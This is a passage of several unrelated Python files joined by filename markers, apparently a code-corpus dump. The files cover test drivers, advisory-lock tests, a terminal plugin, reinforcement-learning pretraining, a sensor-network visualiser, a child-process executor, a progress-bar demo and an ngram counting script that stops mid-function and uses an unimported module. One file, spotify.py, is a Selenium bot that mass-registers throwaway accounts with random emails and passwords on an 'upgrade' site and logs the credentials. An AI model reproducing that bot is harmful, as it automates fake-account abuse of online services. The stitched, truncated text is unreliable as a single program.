# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_master_api_key(),
user_api_key=get_user_api_key(),
)
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0, resource_parameters={}):
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
tool = self.app.toolbox.get_tool(tool_id)
testdef = tool.tests[index]
test_case_cls = functional.test_toolbox.ToolTestCase
test_case = test_case_cls(methodName="setUp") # NO-OP
test_case.shed_tool_id = None
test_case.master_api_key = get_master_api_key()
test_case.user_api_key = get_user_api_key()
test_case.setUp()
test_case.do_it(testdef, resource_parameters=resource_parameters)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
test_driver = test_driver_class()
sys.exit(test_driver.run())
__all__ = (
"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_galaxy_config",
"TestDriver",
"wait_for_http_server",
)
|
test_alock.py | ##
# .test.test_alock - test .alock
##
import unittest
import threading
import time
from ..temporal import pg_tmp
from .. import alock
n_alocks = "select count(*) FROM pg_locks WHERE locktype = 'advisory'"
class test_alock(unittest.TestCase):
@pg_tmp
def testALockWait(self):
# sadly, this is primarily used to exercise the code paths..
ad = prepare(n_alocks).first
self.assertEqual(ad(), 0)
state = [False, False, False]
alt = new()
first = alock.ExclusiveLock(db, (0,0))
second = alock.ExclusiveLock(db, 1)
def concurrent_lock():
try:
with alock.ExclusiveLock(alt, 1):
with alock.ExclusiveLock(alt, (0,0)):
# start it
state[0] = True
while not state[1]:
pass
time.sleep(0.01)
while not state[2]:
time.sleep(0.01)
except Exception:
# Avoid dead lock in cases where advisory is not available.
state[0] = state[1] = state[2] = True
t = threading.Thread(target = concurrent_lock)
t.start()
while not state[0]:
time.sleep(0.01)
self.assertEqual(ad(), 2)
state[1] = True
with first:
self.assertEqual(ad(), 2)
state[2] = True
with second:
self.assertEqual(ad(), 2)
t.join(timeout = 1)
@pg_tmp
def testALockNoWait(self):
alt = new()
ad = prepare(n_alocks).first
self.assertEqual(ad(), 0)
with alock.ExclusiveLock(db, (0,0)):
l=alock.ExclusiveLock(alt, (0,0))
# should fail to acquire
self.assertEqual(l.acquire(blocking=False), False)
# no alocks should exist now
self.assertEqual(ad(), 0)
@pg_tmp
def testALock(self):
ad = prepare(n_alocks).first
self.assertEqual(ad(), 0)
# test a variety..
lockids = [
(1,4),
-32532, 0, 2,
(7, -1232),
4, 5, 232142423,
(18,7),
2, (1,4)
]
alt = new()
xal1 = alock.ExclusiveLock(db, *lockids)
xal2 = alock.ExclusiveLock(db, *lockids)
sal1 = alock.ShareLock(db, *lockids)
with sal1:
with xal1, xal2:
self.assertTrue(ad() > 0)
for x in lockids:
xl = alock.ExclusiveLock(alt, x)
self.assertEqual(xl.acquire(blocking=False), False)
# main has exclusives on these, so this should fail.
xl = alock.ShareLock(alt, *lockids)
self.assertEqual(xl.acquire(blocking=False), False)
for x in lockids:
# sal1 still holds
xl = alock.ExclusiveLock(alt, x)
self.assertEqual(xl.acquire(blocking=False), False)
# sal1 still holds, but we want a share lock too.
xl = alock.ShareLock(alt, x)
self.assertEqual(xl.acquire(blocking=False), True)
xl.release()
# no alocks should exist now
self.assertEqual(ad(), 0)
@pg_tmp
def testPartialALock(self):
# Validates that release is properly cleaning up
ad = prepare(n_alocks).first
self.assertEqual(ad(), 0)
held = (0,-1234)
wanted = [0, 324, -1232948, 7, held, 1, (2,4), (834,1)]
alt = new()
with alock.ExclusiveLock(db, held):
l=alock.ExclusiveLock(alt, *wanted)
# should fail to acquire, db has held
self.assertEqual(l.acquire(blocking=False), False)
# No alocks should exist now.
# This *MUST* occur prior to alt being closed.
# Otherwise, we won't be testing for the recovery
# of a failed non-blocking acquire().
self.assertEqual(ad(), 0)
@pg_tmp
def testALockParameterErrors(self):
self.assertRaises(TypeError, alock.ALock)
l = alock.ExclusiveLock(db)
self.assertRaises(RuntimeError, l.release)
@pg_tmp
def testALockOnClosed(self):
ad = prepare(n_alocks).first
self.assertEqual(ad(), 0)
held = (0,-1234)
alt = new()
# __exit__ should only touch the count.
with alock.ExclusiveLock(alt, held) as l:
self.assertEqual(ad(), 1)
self.assertEqual(l.locked(), True)
alt.close()
time.sleep(0.005)
self.assertEqual(ad(), 0)
self.assertEqual(l.locked(), False)
if __name__ == '__main__':
unittest.main()
|
file_term_network.py | import os
import logging
import threading
import struct
from wxglterm_interface import TermNetwork
from multiple_instance_plugin_base import MultipleInstancePluginBase
LOGGER = logging.getLogger('term_network')
class FileTermNetwork(MultipleInstancePluginBase, TermNetwork):
def __init__(self):
MultipleInstancePluginBase.__init__(self, name="term_network_use_file",
desc="It is a python version term file_term_network",
version=1)
TermNetwork.__init__(self)
def disconnect(self):
pass
def connect(self, host, port, user_name, password):
self._file_path = file_path = self.get_plugin_config().get_entry("/file", "NOT FOUND")
self._len_prefix = self.get_plugin_config().get_entry_bool("/length_prefix", True)
if not os.path.exists(file_path):
LOGGER.error("term data file is not exist:{}".format(file_path))
self.start_reader()
def start_reader(self):
term_data_handler = self.get_plugin_context().get_term_data_handler()
def __read_term_data():
with open(self._file_path, 'rb') as f:
while True:
if self._len_prefix:
data = f.read(4)
if not data or len(data) != 4:
LOGGER.info("end of dump data, quit")
break
data_len = struct.unpack('!i', data)[0]
else:
data_len = 1024
data = f.read(data_len)
if not data or data_len != len(data):
term_data_handler.on_data(data, len(data))
LOGGER.info("end of dump data, quit")
break
term_data_handler.on_data(data, len(data))
return
def read_term_data():
try:
__read_term_data()
except:
LOGGER.exception('read term data failed')
self.reader_thread = reader_thread = threading.Thread(target=read_term_data)
reader_thread.start()
def send(self, data, n):
pass
def resize(self, row, col):
pass
def register_plugins(pm):
pm.register_plugin(FileTermNetwork().new_instance())
|
pre_train.py | '''
## Train ##
# Code to train D4PG Network on OpenAI Gym environments
@author: Mark Sinton (msinto93@gmail.com)
'''
import threading
import random
import tensorflow as tf
import numpy as np
import pickle
from params import train_params
from prioritised_experience_replay import PrioritizedReplayBuffer
from gaussian_noise import GaussianNoiseGenerator
from agent import Agent
from learner import Learner
def train():
tf.reset_default_graph()
# Set random seeds for reproducability
np.random.seed(train_params.RANDOM_SEED)
random.seed(train_params.RANDOM_SEED)
tf.set_random_seed(train_params.RANDOM_SEED)
# Initialise prioritised experience replay memory
PER_memory = PrioritizedReplayBuffer(train_params.REPLAY_MEM_SIZE, train_params.PRIORITY_ALPHA)
# Initialise Gaussian noise generator
gaussian_noise = GaussianNoiseGenerator(train_params.ACTION_DIMS, train_params.ACTION_BOUND_LOW, train_params.ACTION_BOUND_HIGH, train_params.NOISE_SCALE)
# Create session
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
# Create threads for learner process and agent processes
threads = []
# Create threading events for communication and synchronisation between the learner and agent threads
run_agent_event = threading.Event()
stop_agent_event = threading.Event()
# with tf.device('/device:GPU:0'):
# Initialise learner
learner = Learner(sess, PER_memory, run_agent_event, stop_agent_event)
# Build learner networks
learner.build_network()
# Build ops to update target networks
learner.build_update_ops()
# Initialise variables (either from ckpt file if given, or from random)
learner.initialise_vars()
# Get learner policy (actor) network params - agent needs these to copy latest policy params periodically
learner_policy_params = learner.actor_net.network_params + learner.actor_net.bn_params
print('Pretraining')
#load data
with open('saved_experience_normed.p', 'rb') as f:
exp = pickle.load(f)
actions = exp[1]
obs = exp[0]
print(actions.shape)
print(obs.shape)
learner.pretrain(obs, actions)
'''
threads.append(threading.Thread(target=learner.run))
for n_agent in range(train_params.NUM_AGENTS):
# Initialise agent
agent = Agent(sess, train_params.ENV, train_params.RANDOM_SEED, n_agent)
# Build network
agent.build_network(training=True)
# Build op to periodically update agent network params from learner network
agent.build_update_op(learner_policy_params)
# Create Tensorboard summaries to save episode rewards
if train_params.LOG_DIR is not None:
agent.build_summaries(train_params.LOG_DIR + ('/agent_%02d' % n_agent))
threads.append(threading.Thread(target=agent.run, args=(PER_memory, gaussian_noise, run_agent_event, stop_agent_event)))
for t in threads:
t.start()
for t in threads:
t.join()
'''
sess.close()
if __name__ == '__main__':
train()
|
spotify.py | from selenium import webdriver
from multiprocessing import Process, Lock
from time import sleep
import csv
import random
import string
def getRandomString(length): #Letters and numbers
pool=string.ascii_lowercase+string.digits
return "".join(random.choice(pool) for i in range(length))
def getRandomText(length): #Chars only
return "".join(random.choice(string.ascii_lowercase) for i in range(length))
def createSpotifyAccounts(fileName, numberOfAccounts):
# Creating chrome webdriver instance
driver = webdriver.Chrome()
with open('./accounts/' + str(fileName) + '.csv', 'a', newline='') as file:
writer = csv.writer(file)
for i in range(int(numberOfAccounts)):
driver.get('https://spotify-upgrade.net/upgrade')
sleep(1)
password = getRandomString(8)
email = getRandomText(5)+"@"+getRandomText(5)+".com"
driver.find_element_by_xpath('//*[@id="mainLogin"]/div/div[2]/div/div[2]/label[2]').click()
sleep(2)
driver.find_element_by_xpath('//*[@id="mainLogin"]/div/div[2]/div/div[1]/form[2]/div[2]/input').send_keys(email)
driver.find_element_by_xpath('//*[@id="mainLogin"]/div/div[2]/div/div[1]/form[2]/div[3]/input').send_keys(password)
driver.find_element_by_xpath('//*[@id="mainLogin"]/div/div[2]/div/div[1]/form[2]/div[4]/input').click()
sleep(3)
writer.writerow([email, password])
driver.quit()
if __name__ == "__main__":
Processes = []
for num in range(5):
# change 10 with the number of accounts you want to create
a = Process(target=createSpotifyAccounts, args=(num,10,))
a.start()
Processes.append(a)
for p in Processes:
p.join()
|
TosVis.py | import math
import re
import sys
import os
import select
from random import random
from threading import Thread
from TOSSIM import *
from topovis import *
from topovis.TkPlotter import Plotter
## Stores preconfigured LEDs' positions and colors.
#
# The configuration is contained in a list. Each of the entries is
# corresponding to the particular LED based on
# the index in the list. An entry is of the format [[posx,posy],[r,g,b]], where
# (posx,posy) indicates the position relative to the node's center, and
# (r,g,b) indicates the displayed color (0 <= r,g,b <= 1).
LEDS_CONFIG = [
[ [ 5, 5], [1.0, 0.0, 0.0] ],
[ [ 0, 5], [0.0, 0.8, 0.0] ],
[ [-5, 5], [0.0, 0.0, 1.0] ],
]
###############################################
class Node(object):
'''
Defines a generic node object used as a handler for a node modeled in
TOSSIM.
'''
LED_RE = re.compile(r'LEDS: Led(\d) (.*)\.')
AMSEND_RE = re.compile(r'AM: Sending packet \(id=(\d+), len=(\d+)\) to (\d+)')
AMRECV_RE = re.compile(r'Received active message \(0x[0-9a-f]*\) of type (\d+) and length (\d+)')
txRange = 100 # default transmission range
#################################
def __init__(self, location, txRange=100):
'''
The class constructor.
@param location
tuple (x,y) indicating node's location
@param txRange
(optional) transmission range of the node.
'''
self.location = location
self.txRange = txRange
# the following attributes will be set by TosVis
self.id = None
self.tosvis = None
self.tossimNode = None
####################
def animateLeds(self,time,ledno,state):
'''
Animates LEDs status
'''
scene = self.tosvis.scene
(x,y) = self.location
shape_id = '%d:%d' % (self.id,ledno)
if state == 0:
scene.execute(time, scene.delshape, shape_id)
return
if ledno < len(LEDS_CONFIG):
pos,color = LEDS_CONFIG[ledno]
x,y = x+pos[0],y+pos[1]
scene.execute(time, scene.circle, x, y, 2, id=shape_id,
line=LineStyle(color=color), fill=FillStyle(color=color))
####################
def animateAmSend(self,time,amtype,amlen,amdst):
'''
Animates transmission of radio packet for the specified
ActiveMessage type ID
'''
scene = self.tosvis.scene
(x,y) = self.location
range
scene.execute(time, scene.circle, x, y, self.txRange,
line=LineStyle(color=(1,0,0),dash=(1,1)),delay=.1)
####################
def animateAmRecv(self,time,amtype,amlen):
'''
Animates reception of radio packet for the specified
ActiveMessage type ID
'''
scene = self.tosvis.scene
(x,y) = self.location
scene.execute(time, scene.circle, x, y, 10,
line=LineStyle(color=(0,0,1),width=3),delay=.1)
#################################
def processDbgMsg(self, dbgMsg):
simTime = self.tosvis.simTime()
# LED message
match = self.LED_RE.match(dbgMsg)
if match:
ledno = int(match.group(1))
stateStr = match.group(2)
if stateStr == 'off':
state = 0
else:
state = 1
self.animateLeds(simTime, ledno, state)
# AM Send message
match = self.AMSEND_RE.match(dbgMsg)
if match:
amtype = int(match.group(1))
amlen = int(match.group(2))
amdst = int(match.group(3))
self.animateAmSend(simTime, amtype, amlen, amdst)
# AM Receive message
match = self.AMRECV_RE.match(dbgMsg)
if match:
amtype = int(match.group(1))
amlen = int(match.group(2))
self.animateAmRecv(simTime, amtype, amlen)
###############################################
class TosVis(object):
DEBUG_RE = re.compile(r'DEBUG \((\d+)\): (.*)')
####################
def __init__(self, maxTime, autoBoot=True, showDebug=True):
'''
The class constructor.
@param maxTime
time limit for which the simulation will run
@param showDebug
(optional) flag to indicate whether all debugging messages from TOSSIM
should also be displayed on the console
'''
self.tossim = Tossim([])
## Check if nextEventTime() is available in TOSSIM.
## This function is necessary to simulate mobility
#if 'nextEventTime' not in dir(self.tossim):
# print 'Error: TosVis requires nextEventTime() in TOSSIM'
# quit()
self.maxTime = maxTime * self.tossim.ticksPerSecond()
self.showDebug = showDebug
self.nodes = []
self.evq = [] # custom event queue
# setup a pipe for monitoring dbg messages
r,w = os.pipe()
self.dbg_read = os.fdopen(r, 'r')
self.dbg_write = os.fdopen(w, 'w')
self.tossim.addChannel('LedsC', self.dbg_write)
self.tossim.addChannel('AM', self.dbg_write)
####################
def simTime(self):
'''
Returns the current simulation time in seconds
'''
return float(self.tossim.time())/self.tossim.ticksPerSecond()
####################
def addNode(self, node, autoBoot=True):
'''
Adds a new node to the simulation.
@param node
The node object to be added. It must be an instant of the Node class
or any of its subclasses.
@param autoBoot
(optional) flag to indicate whether the added node will be turned
on automatically
@return index of the added node in the 'nodes' list
'''
id = len(self.nodes)
node.id = id
node.tosvis = self
node.tossimNode = self.tossim.getNode(id)
self.createNoiseModel(node)
self.nodes.append(node)
# Randomly set the boot time for the node if autoBoot is true
if autoBoot:
node.tossimNode.bootAtTime(int(random()*self.tossim.ticksPerSecond()))
return id
####################
def setupRadio(self):
'''
Creates ideal radio links for node pairs that are in range
'''
radio = self.tossim.radio()
num_nodes = len(self.nodes)
for i,ni in enumerate(self.nodes):
for j,nj in enumerate(self.nodes):
if i != j:
(isLinked, gain) = self.computeRFGain(ni, nj)
if isLinked:
radio.add(i, j, gain)
####################
def createNoiseModel(self, node):
'''
Obtained from TOSSIM example. No idea what this is.
'''
for i in range(100):
node.tossimNode.addNoiseTraceReading(int(random()*20)-100)
node.tossimNode.createNoiseModel()
####################
def computeRFGain(self, src, dst):
'''
Returns signal reception gain between src and dst using a simple
tx-range model. Should be overriden with a more realistic
propagation model.
'''
if src == dst:
return (False, 0)
(x1,y1) = src.location
(x2,y2) = dst.location
dx = x1 - x2;
dy = y1 - y2;
if math.sqrt(dx*dx + dy*dy) <= src.txRange:
return (True, 0)
else:
return (False, 0)
####################
def moveNode(self, node, location, time=None):
'''
Schedules the specified node to move to the new location at the
specified time. If time is omitted, move the node immediately.
'''
# This function requires access to the simulation queue. TOSSIM must be
# patched for it to work
raise Exception("Node mobility is not yet supported.")
####################
def processDbgMsg(self, dbgMsg):
match = self.DEBUG_RE.match(dbgMsg)
if not match: return
id = int(match.group(1))
detail = match.group(2)
self.nodes[id].processDbgMsg(detail)
####################
def run_tossim(self):
'''
Starts TOSSIM and captures/processes debugging messages. (To be
started in a separate thread.)
'''
self.setupRadio()
while (self.tossim.time() < self.maxTime):
if self.tossim.runNextEvent() == 0:
break
r,w,e = select.select([self.dbg_read.fileno()],[],[],0)
if len(r) == 1:
dbg = self.dbg_read.readline()
self.processDbgMsg(dbg)
if self.showDebug:
sys.stdout.write('%.3f : %s' % (self.simTime(), dbg))
####################
def run(self):
'Starts simulation with visualization'
# Setup an animating canvas
scene = Scene(timescale=1)
tkplot = Plotter()
self.scene = scene
self.tkplot = tkplot
scene.addPlotter(tkplot)
# draw nodes on animating canvas
for n in self.nodes:
scene.node(n.id, n.location[0], n.location[1])
# start TOSSIM thread and enter Tk's mainloop
thr = Thread(target=self.run_tossim)
thr.setDaemon(True)
thr.start()
tkplot.tk.mainloop()
|
child_process_executor.py | '''Facilities for running arbitrary commands in child processes.'''
import os
import queue
import sys
from abc import ABCMeta, abstractmethod
from collections import namedtuple
import six
from dagster import check
from dagster.seven import multiprocessing
from dagster.utils.error import serializable_error_info_from_exc_info
class ChildProcessEvent(object):
pass
class ChildProcessStartEvent(namedtuple('ChildProcessStartEvent', 'pid'), ChildProcessEvent):
pass
class ChildProcessDoneEvent(namedtuple('ChildProcessDoneEvent', 'pid'), ChildProcessEvent):
pass
class ChildProcessSystemErrorEvent(
namedtuple('ChildProcessSystemErrorEvent', 'pid error_info'), ChildProcessEvent
):
pass
class ChildProcessCommand(six.with_metaclass(ABCMeta)): # pylint: disable=no-init
'''Inherit from this class in order to use this library.
The object must be picklable; instantiate it and pass it to _execute_command_in_child_process.'''
@abstractmethod
def execute(self):
''' This method is invoked in the child process.
Yields a sequence of events to be handled by _execute_command_in_child_process.'''
class ChildProcessCrashException(Exception):
'''Thrown when the child process crashes.'''
def _execute_command_in_child_process(event_queue, command):
'''Wraps the execution of a ChildProcessCommand.
Handles errors and communicates across a queue with the parent process.'''
check.inst_param(command, 'command', ChildProcessCommand)
pid = os.getpid()
event_queue.put(ChildProcessStartEvent(pid=pid))
try:
for step_event in command.execute():
event_queue.put(step_event)
event_queue.put(ChildProcessDoneEvent(pid=pid))
except (Exception, KeyboardInterrupt): # pylint: disable=broad-except
event_queue.put(
ChildProcessSystemErrorEvent(
pid=pid, error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
finally:
event_queue.close()
TICK = 20.0 * 1.0 / 1000.0
'''The minimum interval at which to check for child process liveness -- default 20ms.'''
PROCESS_DEAD_AND_QUEUE_EMPTY = 'PROCESS_DEAD_AND_QUEUE_EMPTY'
'''Sentinel value.'''
def _poll_for_event(process, event_queue):
try:
return event_queue.get(block=True, timeout=TICK)
except KeyboardInterrupt as e:
return e
except queue.Empty:
if not process.is_alive():
# There is a possibility that after the last queue.get the
# process created another event and then died. In that case
# we want to continue draining the queue.
try:
return event_queue.get(block=False)
except queue.Empty:
# If the queue empty we know that there are no more events
# and that the process has died.
return PROCESS_DEAD_AND_QUEUE_EMPTY
return None
def execute_child_process_command(command):
'''Execute a ChildProcessCommand in a new process.
This function starts a new process whose execution target is a ChildProcessCommand wrapped by
_execute_command_in_child_process; polls the queue for events yielded by the child process
until the process dies and the queue is empty.
This function yields a complex set of objects to enable having multiple child process
executions in flight:
* None - nothing has happened, yielded to enable cooperative multitasking other iterators
* ChildProcessEvent - Family of objects that communicates state changes in the child process
* KeyboardInterrupt - Yielded in the case that an interrupt was recieved while
polling the child process. Yielded instead of raised to allow forwarding of the
interrupt to the child and completion of the iterator for this child and
any others that may be executing
* The actual values yielded by the child process command
Args:
command (ChildProcessCommand): The command to execute in the child process.
Warning: if the child process is in an infinite loop, this will
also infinitely loop.
'''
check.inst_param(command, 'command', ChildProcessCommand)
event_queue = multiprocessing.Queue()
process = multiprocessing.Process(
target=_execute_command_in_child_process, args=(event_queue, command)
)
process.start()
completed_properly = False
while not completed_properly:
event = _poll_for_event(process, event_queue)
if event == PROCESS_DEAD_AND_QUEUE_EMPTY:
break
yield event
if isinstance(event, (ChildProcessDoneEvent, ChildProcessSystemErrorEvent)):
completed_properly = True
if not completed_properly:
# TODO Gather up stderr and the process exit code
raise ChildProcessCrashException()
process.join()
|
two-tasks.py | #!/usr/bin/env python
"""
Two progress bars that run in parallel.
"""
import threading
import time
import quo
def main():
with quo.ProgressBar() as pb:
# Two parallal tasks.
def task_1():
for i in pb(range(100)):
time.sleep(0.05)
def task_2():
for i in pb(range(150)):
time.sleep(0.08)
# Start threads.
t1 = threading.Thread(target=task_1)
t2 = threading.Thread(target=task_2)
t1.daemon = True
t2.daemon = True
t1.start()
t2.start()
# Wait for the threads to finish. We use a timeout for the join() call,
# because on Windows, join cannot be interrupted by Control-C or any other
# signal.
for t in [t1, t2]:
while t.is_alive():
t.join(timeout=0.5)
if __name__ == "__main__":
main()
|
parallelGram.py | __author__ = 'joe'
import os
import collections
import numpy as np
import pandas as pd
import pickle
import gzip
from collections import defaultdict
from collections import Counter
import io
import requests
import urllib
import dill
import multiprocessing
import sys
def getFiles(ngram_path):
"""
Gets list of ngram file names
:param ngram_path:
:return: list of ngram file names
"""
ngram_files = []
for f in os.listdir(ngram_path):
if os.path.isfile(os.path.join(ngram_path, f)) and not f.startswith('.'):
ngram_files.append(f)
return(ngram_files)
def getWords(wordPath):
"""
Get list of words from specified file
:param wordPath:
:return: Get the words specified in input file
"""
with open(wordPath, 'rb') as wf:
words = [w.strip() for w in wf.readline().split(',')]
return(words)
def getNegWords(wordPath):
"""
Get list of words from specified file
:param wordPath:
:return: Get the words specified in input file
"""
with open(wordPath, 'rb') as wf:
lb1 = r'(?<!'
lb2 = r' )'
negReg = ''.join([lb1 + nw.strip() + lb2 for nw in wf.readline().split(',')])
return(negReg)
def chunks(l, nJobs):
"""
Split l files into nJobs
:param l:
:param nJobs:
:return: Yield an index range for l of n items
"""
n = len(l)/nJobs
# For item i in a range that is a length of l,
for i in range(0, len(l), n):
# Create an index range for l of n items:
yield l[i:i + n]
def mergeDicts(dictList):
"""
Because this program splits the search across jobs,
we need a way to combine the results. This function does that.
:param dictList:
:return: A dictionary containing all co-occurrences
"""
uniondict = defaultdict(lambda: defaultdict(lambda: 0))
for d in dictList:
for k1, v1 in d.items():
for k2, v2 in v1.items():
if type(v2) == int:
uniondict[k1][k2] += int(v2)
return (uniondict)
def gnTotal(url):
"""
Google provides a count of total ngrams for a given size.
This function downloads that file and gets totals for each year.
:param url:
:return:
"""
response = urllib.urlopen(url)
lines = response.readlines()[0].split('\t')
total_counts = {'year': [], 'total_words': [], 'total_pages': [], 'total_volumes': []}
for line in lines:
line = line.split(',')
if len(line) == 4:
total_counts['year'].append(line[0])
total_counts['total_words'].append(line[1])
total_counts['total_pages'].append(line[2])
total_counts['total_volumes'].append(line[3])
totalCountsDf = pd.DataFrame.from_dict(total_counts)
return(totalCountsDf)
def chunkGrams3(ngram_chunk, baseWords, targetWords, output_path, ngram_path, negReg):
"""
This function using pattern matching to identify co-occurrences.
:param ngram_chunk: The files to search through for given job
:param baseWords: List of base words
:param targetWords: List of target words
:param output_path: Where should results be stored?
:param ngram_path: Where are the ngrams?
:param negWords: Negation words to exclude by
:return: Nothing. Dumps results to pickeled file
"""
wordFreqs = defaultdict(lambda: defaultdict(lambda: 0))
coFreqs = defaultdict(lambda: defaultdict(lambda: 0))
wordVols = defaultdict(lambda: defaultdict(lambda: 0))
coVols = defaultdict(lambda: defaultdict(lambda: 0))
file_counter = 0
total_files = len(ngram_chunk) + 1
baseWords = baseWords + ['behebung']
targetWords = targetWords
for ngram_file in ngram_chunk:
file_counter +=1
print 'Analyzing file {0} of {1} in chunk'.format(file_counter, total_files)
cur_file = gzip.open(os.path.join(ngram_path, ngram_file), 'rb')
for line in cur_file:
dat = line.split('\t')
phrase = dat[0].lower()
if any(baseWord in phrase for baseWord in baseWords): # If contains baseword then
if any(targetWord in phrase for targetWord in targetWords): # If also contains target word, then
for bWord in baseWords:
reg = negReg + r'\b' + re.escape(bWord) + r'\b'
try:
re.search(reg, phrase).group(0)
wordFreqs[dat[1]][bWord] += int(dat[2])
wordVols[dat[1]][bWord] += int(dat[3].replace('\n', ''))
for tWord in targetWords:
regT = negReg + r'\b' + re.escape(tWord) + r'\b'
try:
re.search(regT, phrase).group(0)
wordFreqs[dat[1]][tWord] += int(dat[2])
wordVols[dat[1]][tWord] += int(dat[3].replace('\n', ''))
coFreqs[dat[1]]['_'.join([bWord,tWord])] += int(dat[2])
coVols[dat[1]]['_'.join([bWord,tWord])] += int(dat[3].replace('\n', ''))
except:
continue
except:
continue
else:
for bWord in baseWords:
reg = negReg + r'\b' + re.escape(bWord) + r'\b'
try:
re.search(reg, phrase).group(0)
wordFreqs[dat[1]][bWord] += int(dat[2])
wordVols[dat[1]][bWord] += int(dat[3].replace('\n', ''))
except:
continue
elif any(targetWord in phrase for targetWord in targetWords):
for tWord in targetWords:
regT = negReg + r'\b' + re.escape(tWord) + r'\b'
try:
print re.search(regT, phrase).group(0)
wordFreqs[dat[1]][tWord] += int(dat[2])
wordVols[dat[1]][tWord] += int(dat[3].replace('\n', ''))
except:
continue
dictFreqs = mergeDicts(dictList=[wordFreqs,coFreqs])
dictVols = mergeDicts(dictList=[wordVols,coVols])
ds = [dictFreqs, dictVols]
print 'Writing {0}'.format(output_path)
dill.dump(ds, open(output_path, 'wb'))
def chunkGrams2(ngram_chunk, baseWords, targetWords, output_path, ngram_path):
"""
This function using pattern matching to identify co-occurrences.
:param ngram_chunk: The files to search through for given job
:param baseWords: List of base words
:param targetWords: List of target words
:param output_path: Where should results be stored?
:param ngram_path: Where are the ngrams?
:return: Nothing. Dumps results to pickeled file
"""
wordFreqs = defaultdict(lambda: defaultdict(lambda: 0))
coFreqs = defaultdict(lambda: defaultdict(lambda: 0))
wordVols = defaultdict(lambda: defaultdict(lambda: 0))
coVols = defaultdict(lambda: defaultdict(lambda: 0))
file_counter = 0
total_files = len(ngram_chunk) + 1
baseWords = baseWords + ['behebung']
targetWords = targetWords
for ngram_file in ngram_chunk:
file_counter +=1
print 'Analyzing file {0} of {1} in chunk'.format(file_counter, total_files)
cur_file = gzip.open(os.path.join(ngram_path, ngram_file), 'rb')
for line in cur_file:
dat = line.split('\t')
phrase = dat[0].lower()
if any(baseWord in phrase for baseWord in baseWords): # If contains baseword then
if any(targetWord in phrase for targetWord in targetWords): # If also contains target word, then
for bWord in baseWords:
reg = r'\b' + re.escape(bWord) + r'\b'
try:
re.search(reg, phrase).group(0)
wordFreqs[dat[1]][bWord] += int(dat[2])
wordVols[dat[1]][bWord] += int(dat[3].replace('\n', ''))
for tWord in targetWords:
regT = r'\b' + re.escape(tWord) + r'\b'
try:
re.search(regT, phrase).group(0)
wordFreqs[dat[1]][tWord] += int(dat[2])
wordVols[dat[1]][tWord] += int(dat[3].replace('\n', ''))
coFreqs[dat[1]]['_'.join([bWord,tWord])] += int(dat[2])
coVols[dat[1]]['_'.join([bWord,tWord])] += int(dat[3].replace('\n', ''))
except:
continue
except:
continue
else:
for bWord in baseWords:
reg = r'\b' + re.escape(bWord) + r'\b'
try:
re.search(reg, phrase).group(0)
wordFreqs[dat[1]][bWord] += int(dat[2])
wordVols[dat[1]][bWord] += int(dat[3].replace('\n', ''))
except:
continue
elif any(targetWord in phrase for targetWord in targetWords):
for tWord in targetWords:
regT = r'\b' + re.escape(tWord) + r'\b'
try:
print re.search(regT, phrase).group(0)
wordFreqs[dat[1]][tWord] += int(dat[2])
wordVols[dat[1]][tWord] += int(dat[3].replace('\n', ''))
except:
continue
dictFreqs = mergeDicts(dictList=[wordFreqs,coFreqs])
dictVols = mergeDicts(dictList=[wordVols,coVols])
ds = [dictFreqs, dictVols]
print 'Writing {0}'.format(output_path)
dill.dump(ds, open(output_path, 'wb'))
def chunkGrams1(ngram_chunk, baseWords, targetWords, output_path, ngram_path):
"""
This function using exact matching to identify co-occurrences.
:param ngram_chunk: The files to search through for given job
:param baseWords: List of base words
:param targetWords: List of target words
:param output_path: Where should results be stored?
:param ngram_path: Where are the ngrams?
:return: Nothing. Dumps results to pickeled file
"""
wordFreqs = defaultdict(lambda: defaultdict(lambda: 0))
coFreqs = defaultdict(lambda: defaultdict(lambda: 0))
wordVols = defaultdict(lambda: defaultdict(lambda: 0))
coVols = defaultdict(lambda: defaultdict(lambda: 0))
file_counter = 0
total_files = len(ngram_chunk) + 1
for ngram_file in ngram_chunk:
file_counter +=1
print 'Analyzing file {0} of {1} in chunk'.format(file_counter, total_files)
cur_file = gzip.open(os.path.join(ngram_path, ngram_file), 'rb')
for line in cur_file:
dat = line.split('\t')
phrase = dat[0].lower()
if any(baseWord in phrase for baseWord in baseWords): # If contains baseword then
if any(targetWord in phrase for targetWord in targetWords): # If also contains target word, then
for bWord in baseWords:
if bWord in phrase:
wordFreqs[dat[1]][bWord] += int(dat[2])
wordVols[dat[1]][bWord] += int(dat[3].replace('\n', ''))
for tWord in targetWords:
if tWord in phrase:
wordFreqs[dat[1]][tWord] += int(dat[2])
wordVols[dat[1]][tWord] += int(dat[3].replace('\n', ''))
coFreqs[dat[1]]['_'.join([bWord,tWord])] += int(dat[2])
coVols[dat[1]]['_'.join([bWord,tWord])] += int(dat[3].replace('\n', ''))
else:
for bWord in baseWords:
if bWord in phrase:
wordFreqs[dat[1]][bWord] += int(dat[2])
wordVols[dat[1]][bWord] += int(dat[3].replace('\n', ''))
elif any(targetWord in phrase for targetWord in targetWords):
for tWord in targetWords:
if tWord in phrase:
wordFreqs[dat[1]][tWord] += int(dat[2])
wordVols[dat[1]][tWord] += int(dat[3].replace('\n', ''))
dictFreqs = mergeDicts(dictList=[wordFreqs,coFreqs])
dictVols = mergeDicts(dictList=[wordVols,coVols])
ds = [dictFreqs, dictVols]
print 'Writing {0}'.format(output_path)
dill.dump(ds, open(output_path, 'wb'))
def main(ngramSyntax = sys.argv[1]):
"""
This function extracts necessary parameters from the parameters txt file
and distributes the jobs across workers.
:param ngramSyntax:
:return:
"""
pars = []
with open(ngramSyntax, 'rb') as ngs:
for line in ngs:
pars.append(line.replace('\n', '').strip())
ngram_path = pars[0]
nJobs = int(pars[1])
output_dir = pars[2]
baseWordPath = pars[3]
targetWordPath = pars[4]
coType = pars[5]
if coType == '3':
